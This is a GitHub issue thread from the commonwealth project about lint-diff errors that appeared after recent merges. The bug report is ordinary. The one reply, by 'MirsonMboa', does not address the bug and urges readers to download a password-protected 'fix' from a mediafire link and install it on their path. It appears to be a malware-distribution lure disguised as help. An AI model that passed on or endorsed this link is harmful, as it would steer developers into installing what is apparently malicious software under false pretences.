### ISSUE TITLE
lint-diff found issues with recent merges.  

### ISSUE THREAD

**Issue by burtonator** [hicommonwealth/commonwealth#8992]
## Describe the bug

Tim reported a bug where lint-diff found issues with a recent merge. I think it was due to turning them on in 'libs' and then setting the pointer too far fowrard.

### Initial conditions

**Environment:** 

**Branch/Release version:** 

**Browser:** 

**Wallet:**

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
